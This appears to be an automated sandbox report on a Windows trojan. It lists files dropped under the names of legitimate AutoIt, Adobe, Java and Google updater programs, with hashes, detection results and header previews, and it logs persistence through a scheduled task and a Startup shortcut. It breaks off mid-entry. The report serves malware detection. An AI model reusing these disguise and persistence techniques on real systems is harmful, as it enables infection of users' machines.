05:41:08	Task Scheduler	Run new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
05:41:18	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1353216
Entropy (8bit):	5.324374334925095
Encrypted:	false
SSDEEP:	12288:9C4VQjGARQNhiFXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:9OCAR0iFsqjnhMgeiCl7G0nehbGZpbD
MD5:	3CEF2044070B18A48154FB9C97AA9894
SHA1:	F40659F7934D08A9370BE25A23F7EA965C58CEBD
SHA-256:	A0A25EE75DFEEB715902A850F2E5270A2E7D11345FBE831C8959B3C720291D79
SHA-512:	870DF57EF53F4297826EFD225E1268C729777FFDD0366D4993D16F5CA44DBB788F1F45B5005C556E536D87B41130751B701A006786C7A056915E70C4ADC7154C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.~.2.-.2.-.2.-n.G-.2.-n.E-J2.-n.D-.2.-.Z.,.2.-.Z.,.2.-.Z.,.2.-.J%-.2.-.2.-.2.-.[.,.2.-.[I-.2.-.2!-.2.-.[.,.2.-Rich.2.-........................PE..L...g.(c.....................6......&........0....@...........................!.....`.......................................,b..<....p...............................L..8............................L..@............0..,............................text............................... ..`.rdata...8...0...:..."..............@..@.data........p.......\..............@....rsrc....P...p...@...f..............@...................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\Au3Info.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1294848
Entropy (8bit):	5.282688704639768
Encrypted:	false
SSDEEP:	12288:QNUpaKghiXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:QCMKgwsqjnhMgeiCl7G0nehbGZpbD
MD5:	84F3DFA87144D881455A9AF432FBE472
SHA1:	2B8CC3C50DE7E126065B60E82DC6019E917ED097
SHA-256:	141FEB9D1C1A0F1EF22BED0EC4B1879A655F262A46ED807CBFCD585D56F5E1C2
SHA-512:	FC7E9D63241483FD26AC32770BFBABA861100D71CC7A42D66DD409BDFABA3D31FFE6E843A86A3BE57BF8A8B019EDAF661F218F2ABA6EB9BEA51196D77C7B8DAA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........jZ..9Z..9Z..9...9Q..9...9%..9...9B..9...8r..9...8K..9...8H..9S.x9W..9Z..9..9...8]..9...9[..9Z.\|9[..9...8[..9RichZ..9........PE..L...C.(c.........."......:...........\.......P....@........................... .............................................$...........0..............................8...............................@............P...............................text...19.......:.................. ..`.rdata...\|...P...~...>..............@..@.data...............................@....rsrc...0...........................@..@.reloc...`...`...P...r..............@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1314304
Entropy (8bit):	5.274128553054252
Encrypted:	false
SSDEEP:	12288:eMEhwdbTJXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:UKdHJsqjnhMgeiCl7G0nehbGZpbD
MD5:	D183F9A9A76CE8B5D72F09E81D16FF36
SHA1:	B99AA4BBFF881822CB6C8308E25F44408F9C0DB1
SHA-256:	C3DACC511DAA75821A1F554D0670C4D2263967A0F80AB40789351E4F2D621D79
SHA-512:	724DE3CEDA6E813878C46031B1803BA883CBB49C4E8C1E563B7D0286636AC0C446029F140CF81BBCD090BFC73181F18B7E826B183C165D05978E946CD17E115D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9..X...X...X..-....X..-....X..-....X...0...X...0...X...0...X... n..X...X..YX..<1.X..<1...X...Xj..X..<1...X..Rich.X..........................PE..d...G.(c.........."......J...^......Tr.........@............................. !.....A..... .................................................,........ ..0...............................8............................................`..`............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data........ ......................@....pdata..............................@..@.rsrc...0.... ......."..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2203136
Entropy (8bit):	7.647018377029277
Encrypted:	false
SSDEEP:	49152:GK0eqkSR7Xgo4TiRPnLWvJVDmg27RnWGj:GK0pR7Xn4TiRCvJVD527BWG
MD5:	B9AA37BEDCE4CDC5BAFD77770D6565F4
SHA1:	40575F1C8BE2C0793365787E96E7D51F7A2A969E
SHA-256:	AF6CC87911AB5F5C90818BA787D11020CF96ADE6895F4542E1F3C1AE1171BCDB
SHA-512:	701373B68965D5A0C6EE7533B2417A9AD2AFCA22AE601EFD19534124E1F23308BA517077476651BBFC251C217B9F5CF183D7057A4724602E1BDFF216AD9BEE0A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................Y;6....Y;4.x...Y;5...........................D......T...........H......H.8.....P....H......Rich...................PE..L...9.(c..........#..................d............@..........................."......-"..............................................p..X...............................p...............................@...............X............................text.............................. ..`.rdata..$H.......J..................@..@.data....@... ......................@....rsrc........p......................@...................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2369024
Entropy (8bit):	7.565045718394376
Encrypted:	false
SSDEEP:	49152:DfYP1JsEDkSR7Xgo4TiRPnLWvJVDmg27RnWGj:7YPBR7Xn4TiRCvJVD527BWG
MD5:	665D894BC5E072B3572AA1E53AFB1261
SHA1:	2390EB1825A6A8A037AFB8CA197092964FA68F96
SHA-256:	C58E912DCB30D759E3FE3C2AF9F101339DBB161A8EA4EB6E80A33052DFFD2D23
SHA-512:	956CCC52A894054CF4C09D82BA864E125980AD90905B15E60858C097EE3FC8B3FAAE3DF016157E15A22E5FD4912597D5C7A68EFC0488CD080630DF36D1C2F3E6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<y..x...x...x....~.s....\|......}.a...p..i...p..p...*p..H...q`..z...q`..a...x...s....q..[....qp.y...x...z....q..y...Richx...........PE..d...>.(c..........#..........0......(..........@..............................$.......$... .............................................................X........e...................n..p...................0p..(...0o...............0...............................text............................... ..`.rdata.......0......."..............@..@.data....R...0... ... ..............@....pdata...e.......f...@..............@..@.rsrc...............................@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1245184
Entropy (8bit):	5.12354717895086
Encrypted:	false
SSDEEP:	12288:P62SYUcknnLXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:cYUcknLsqjnhMgeiCl7G0nehbGZpbD
MD5:	161812552AE76EF9776BBDB21E99601D
SHA1:	F1D75082644531063C12BA676019A18F8B22B2EA
SHA-256:	35EE845D43592F6129F365B7724B681A2AE330B81EAC29D3FB945FF5CCD9CC20
SHA-512:	5D9B81B0A0EEBE938EB4E58DB73AD9D625D57575A043ECE862E3A29C54E87EAD46888E59EAA69259C0CFE8ADCD50F3D8F3BF4A6427316EF479124FA8674DF9A1
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[m..5>..5>..5>OC.>..5>OC.>..5>OC.>..5>..0?..5>..1?..5>..6?..5>.>..5>..4>..5>.>..5>^.<?..5>^..>..5>..>..5>^.7?..5>Rich..5>........................PE..L.....(c..........................................@..........................@.......n.......................................%..d....P.................................8...............................@...............t............................text.............................. ..`.rdata...^.......`..................@..@.data...l....0....... ..............@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1640448
Entropy (8bit):	7.166647190133872
Encrypted:	false
SSDEEP:	49152:4+iAqSPyC+NltpScpzbtvpJoMQSq/jrQaSBDmg27RnWGj:gSktbp/D527BWG
MD5:	7B1CEFE2EAD62CEBCFFF130F78C8F1FA
SHA1:	8C617F5689BA7AF0C03D5C6D6C0C568EB36C493D
SHA-256:	8F6B7463B62BB4EB23039309920197782EA9E39A6D55360744BDB7039AB73297
SHA-512:	1C988449A57A96F23F4F596D2A9B4D8B387342B4B58F6F73B9105F06687172E1996671AB6E3A9983367DF0DBEE49E9D86885BD003659175D960CB3F96C0CD577
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......}0tp9Q.#9Q.#9Q.#...#,Q.#...#.Q.#...#.Q.#...#8Q.#k9.".Q.#k9."(Q.#k9."1Q.#0).#1Q.#0).#8Q.#0).#.Q.#9Q.#.S.#.8."hQ.#.8."8Q.#.8.#8Q.#9Q.#;Q.#.8."8Q.#Rich9Q.#........PE..d...3.(c.........."......H...*.......Z.........@...................................../.... ...@...............@..............................l..\|.......P....P...o.................. .......................p...(...@................`..8............................text...<G.......H.................. ..`.rdata..\|B...`...D...L..............@..@.data... ........P..................@....pdata...o...P...p..................@..@.rsrc...P............P..............@..@.reloc...............(..............@...................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2953728
Entropy (8bit):	7.09461101245785
Encrypted:	false
SSDEEP:	49152:eGSXoV72tpV9XE8Wwi1aCvYMdVluS/fYw44RxLODmg27RnWGj:64OEtwiICvYMRfuD527BWG
MD5:	3D90F58B5C99B5A085B44E873D3713C9
SHA1:	EFCE755B612D2DF1C56815F52DA4ADE4ED2AE811
SHA-256:	97EBD51AB6FF0AE9A6B0B2FBD11E9075ABA56BFAF57A40B8B46FA30ABA089E68
SHA-512:	8DAF0D878F6DE85ED6C5A2346D5D4687E8B6CC01B75069DF590BDAEEC88622E75F1B5E8D2730553A5EAD7027070D48BF143B7A2782003A0B8F40E267CD1D142A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~....................@..........................P-.....................................p...<............@ .............................@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1485824
Entropy (8bit):	5.496387324919802
Encrypted:	false
SSDEEP:	24576:uAMuR+3kMbVjhVsqjnhMgeiCl7G0nehbGZpbD:jD+lbVjhJDmg27RnWGj
MD5:	13A468695A9200513892BD8D5CACBBD1
SHA1:	58C0C2BC359DD53C02B4B3B687D34813DED47A79
SHA-256:	C2F252E4A06E6AB3A202CD7634C8C56AA8E974A76FD3FDCDF8EA9784BBD9A521
SHA-512:	54D235EBE798D7463C333F3FBC4CF013A7A84C8539485F7C960E3A954172BB3715BAB7BC327BE87D09AE072D74580D5119B8708AB2049BAA7BFD948109473D67
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4...Uu..Uu..Uu..=v..Uu..=q..Uu..=p.pUu..=s..Uu..8q..Uu..8v..Uu..8p.@Uu.....Uu..=t..Uu..Ut..Wu.Z;p..Uu.Z;...Uu..U...Uu.Z;w..Uu.Rich.Uu.................PE..L......d.................N...P...............`....@..........................................................................`..@.......(...............................T...............................@............`..L............................text...zL.......N.................. ..`.rdata.......`.......R..............@..@.data...\D...........p..............@....rsrc...(...........................@..@.reloc...........p...<..............@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Download File

Process:	C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1290240
Entropy (8bit):	5.277755671556221
Encrypted:	false
SSDEEP:	12288:UImGUcsvZZdubv7hfl3PXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:UxGBcml/sqjnhMgeiCl7G0nehbGZpbD
MD5:	A51EBECF3C5FA1A6BA9D9DC01B9461A7
SHA1:	B90B98D5A0DA70B823EC4EF5ECCE83A74C512387
SHA-256:	3AD9D79BD15AEF523516C1267D1AB3ECE946AA352D8C58F1A56A07DB2F435A34
SHA-512:	0E14689BD8C40262A9BAEAC52C933EFB1C76AAEBB425D5555B81CB39815082EF5CDF019D1D972DE3E9B8D434DF61F886BECE3E752E8E68E6CE07BFA944C6D436
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@.................................S.......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...`.......P...`..............@...........................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1644544
Entropy (8bit):	5.694783478247666
Encrypted:	false
SSDEEP:	24576:J0vHyeLj8trn3ws7sqjnhMgeiCl7G0nehbGZpbD:8tj4rgsvDmg27RnWGj
MD5:	3D411E2C067C4FDBDD9A94050506BF1D
SHA1:	8454250822E55902FBF667ADBCE79CE2F187153E
SHA-256:	6E7B2C0C55382010C85DF01BB6ED6DBB4AC7E03464F835AFFBE7564E2A48DA27
SHA-512:	2D568B3A9C53C75C0512756AC5811A8F82A5515006C4B706043AAC9A47184A843CEC865D3DBDD0074D35D0526DEE1FED666ADA3C66C33E6D13E7455A76FA8FFF
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g=H(#\&{#\&{#\&{77%z2\&{77#z.\&{A$.{"\&{A$"z1\&{A$%z5\&{A$#zu\&{77"z;\&{77 z"\&{77'z4\&{#\'{.\&{.%"z$\&{.%#z.\&{.%.{"\&{#\.{!\&{.%$z"\&{Rich#\&{........PE..L.....d............................7........0....@..........................`.......=......................................<........P...\|..........................0m..............................pl..@............0..t............................text...?........................... ..`.rdata.......0......................@..@.data....3....... ..................@....rsrc....\|...P...~..................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1781760
Entropy (8bit):	7.27966203412623
Encrypted:	false
SSDEEP:	24576:goMOW0n7Ubxk/uRv5qLGJLQ4a56duA/85RkV4l7/ZqsqjnhMgeiCl7G0nehbGZpv:F4i0wGJra0uAUfkVy7/Z+Dmg27RnWGj
MD5:	42103DD10781367A5362F3540C09F773
SHA1:	9E53A802FAD50C09F66FD90AA09B930E01BC8D14
SHA-256:	B1426AAFCCBBE9A8A28260EE4BB91D39BC081B0A901C3F3331724F3E2BD49049
SHA-512:	36308C8A589F7B7EFDDB1E6343E739CBC1F6D226456710FB2C2F24C744C825B59262FA80A6D6F5C8A33E85E42494269484CAC7CD1AB300C7F6BDEE96F890E39C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...................................p.....l.......................................................<......<....<.n.............<......Rich............................PE..L.....d.................:...*...............P....@.............................................................................,.......................................................................@............P...............................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data...PG...0...2..................@....rsrc................D..............@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1318400
Entropy (8bit):	7.448758404521054
Encrypted:	false
SSDEEP:	24576:8eR0gB6axoCf0R6RLQRF/TzJqe58BimNsqjnhMgeiCl7G0nehbGZpbD:ogHxmR6uBTzge5MimxDmg27RnWGj
MD5:	F86DD06AD4E86D9C455790F3945E84F1
SHA1:	968C0F406423F667AD2F928EBEA53DB3ABE47883
SHA-256:	A147F502182BEA4A718008549BC1EECB445BBB4BA5D133CB3F995C959B0ED548
SHA-512:	CB55FD1627FD57E08329F58C99C9F4F1CB42BF1831B67A6A2F5E0DA0C02249AA2453854E364BB8D7C5A35BF4D633FBFB004E5A40F065E3F1BE2AA09C97181339
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........r.b.!.b.!.b.!... .b.!... xb.!..1!.b.!... .b.!... .b.!... .b.!... .b.!... .b.!... .b.!.b.!.c.!?.. .b.!?.. .b.!?.3!.b.!.b[!.b.!?.. .b.!Rich.b.!........PE..L.....d..........................................@..........................`..............................................t$.....................................`T...............................S..@............................................text...L........................... ..`.rdata..0Z.......\..................@..@.data...8<...@...(...&..............@....rsrc...............N..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1375232
Entropy (8bit):	5.446059856656136
Encrypted:	false
SSDEEP:	12288:bnEbH0j4x7R6SvyCMrXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:bkwOtO7rsqjnhMgeiCl7G0nehbGZpbD
MD5:	81DC21C79FB92D66EB79BE4E14D709F3
SHA1:	3654490882126729C25D34D9AFE4334249191296
SHA-256:	A4A57FD6C5F0AD4FF899C1E093B3D532BFE5078F20B988CF5CFF6F68AF939758
SHA-512:	BB5A61B81830C908BF2EE3D03D25C850E040E001402AEA1B189DFA08AAE7D93278A247EBBC36870B852535452381A245A41D24CD3F4642C0D5679BA28CFF96BA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@......0\.......................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1375232
Entropy (8bit):	5.446805979409078
Encrypted:	false
SSDEEP:	24576:wnU/h/4KosqjnhMgeiCl7G0nehbGZpbD:wU/VUDmg27RnWGj
MD5:	4A20D39715C23E986809208732FA3B14
SHA1:	8B45B4AACD49D547057E99DF5B09349F3312FD50
SHA-256:	CA2D870223E269BDBBB70CEB9EAB33CD50B7C5F380CCA1B57A452E77FCDB241E
SHA-512:	605CB476222D4DCF0E46D8714B6E2F4F0DC6AADDD4CA1B44797748CE41A3F1E3CEC7B3497F35042705E1924CA223CA89BC145CACACCD55FD5F6CC52C141DABB6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p\|..p..q\|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@...............................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1513984
Entropy (8bit):	5.483729591858868
Encrypted:	false
SSDEEP:	24576:qx71iBLZ05jNTmJWEx/sqjnhMgeiCl7G0nehbGZpbD:qxhiHIjNgjDmg27RnWGj
MD5:	8D4E35F2B1CCA01B0949B6DA870161CE
SHA1:	EBE413EB60E5145356864CB513F11AD5FFC1E1A0
SHA-256:	3A58A21FF0270AEEF2596DF0151320F14DDDF1322D03CBCFFE8DEF65EA656ECD
SHA-512:	C886A625F2F464EBE16B59D0B68B6C548232D4C7138213B8F9D5A6DE598FF0853E55A022695DF55D34B8D4D428B5842999CBC05362E658C82D85302BD4FCC771
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@.................................\...........................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1419264
Entropy (8bit):	5.466705586398309
Encrypted:	false
SSDEEP:	24576:/lnRklQ6fgJcEwixVsqjnhMgeiCl7G0nehbGZpbD:joRfgJcEwCJDmg27RnWGj
MD5:	341BA9E0CB8C5D9C7C29F33A0B12D165
SHA1:	1013DA57EB408C94A662CF3CF5DA6E3285162EF7
SHA-256:	8D25889CBD87479F203A12B611841B26D9F18CD5DB0C4A0486E79ECAEA859861
SHA-512:	24A0A599E95680478E30E1B56CEE40610E169917A8736F66C88C62EFBCF0714CA2A3CBA5CED37CFF3CE702D89B1319CFC81AAF1A36A17A5448569D3F6AF84D44
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\|../../../L...../L...8./+...../+...../+...../L...../L...../../4./..../.s/../..../Rich../........................PE..L...A..d.............................s............@.........................................................................<........P...2..............................T...........................8...@............................................text............................... ..`.rdata...%.......&..................@..@.data...d(... ......................@....rsrc....2...P...4..................@..@.reloc...p.......`...H..............@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1522176
Entropy (8bit):	5.496511671246881
Encrypted:	false
SSDEEP:	24576:YW25k8hb0Haw+xlsqjnhMgeiCl7G0nehbGZpbD:YWyk8SHawmZDmg27RnWGj
MD5:	4A157AB45F94C3F5403E0A255A026CD9
SHA1:	EBED4B593FB06408014C206E342956A2DF9A528A
SHA-256:	1CE618C47D2A22F69802DCCB29C548F8CFC3A9F83E84BCDC860D183E27AD3D2E
SHA-512:	4E48AF438D90D1963E45473A03AC51EBE27FCC77292B9318CBDB97967DA726C722E8DFC95A2FC86F21B14DA79737BB98DC695A85C38167F468C0072BDB22F72B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.s.%.s.%.s.%...$ms.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%.s.%xr.%...$.s.%...%.s.%...$.s.%Rich.s.%................PE..d...X..d.........."..........R......L..........@....................................[4.... ..................................................M....... ...2.......,................... ..T............................ ..................(............................text............................... ..`.rdata..............................@..@.data....6...p.......X..............@....pdata...,...........j..............@..@_RDATA..............................@..@.gxfg...0...........................@..@.gehcont............................@..@.rsrc....2... ...4..................@..@.reloc...`...`...P..................@...........................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1282048
Entropy (8bit):	5.16394208440059
Encrypted:	false
SSDEEP:	12288:GWP/aK2vB+WXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:GKCKAB9sqjnhMgeiCl7G0nehbGZpbD
MD5:	5FD848A297368B825A691C99E03D57FE
SHA1:	4C9CE217F0DB00514322D2436C128516E21F0DF4
SHA-256:	909D50227A5F149AD1A4C3D2610B701CBCE1B6E7AF926C2941B21E8A9D7811EA
SHA-512:	004E44E921634B3C6E5E580ECC5A6D50E1C21DD9EB1F76873EBF540C50B57E0DD644DEB9BA9D303385A4AA91A49AB4FA2E88D653BAE6C1DC3AD35AB18B382EE3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...U..U..U.M.V..U.M.P...U.M.Q..U..Q..U..V..U.*.P..U.M.T..U..T...U..\..U....U.....U..W..U.Rich..U.........PE..L...9..d.................D..........Ru.......`....@.................................E.......................................P...x....... ...........................p[..T............................[..@...............L............................text....B.......D.................. ..`.data...x....`.......H..............@....idata...............R..............@..@.rsrc... ............\..............@..@.reloc...`.......P...@..............@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1228288
Entropy (8bit):	5.162016392953371
Encrypted:	false
SSDEEP:	12288:WO7cCNWB+09YXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:DjNWBPGsqjnhMgeiCl7G0nehbGZpbD
MD5:	931BF7B6BD91341FD7B6E245FB71DC2B
SHA1:	85CD8FD855D45096EE41A1BDA7FED858C6CF6D39
SHA-256:	ADD11ED922F36DA8A51F90590D610B4A70C2DFD9D0C489BB4957382F85674F9C
SHA-512:	64A6EA939EC86B741E22B877F48495FF0305E18113CE17B2E3B1E1AD1AF4CE3A5E19072FDE7DDE666972C0268A69CD23A287D9B6F97137B3994CDF9A7D775201
Malicious:	true
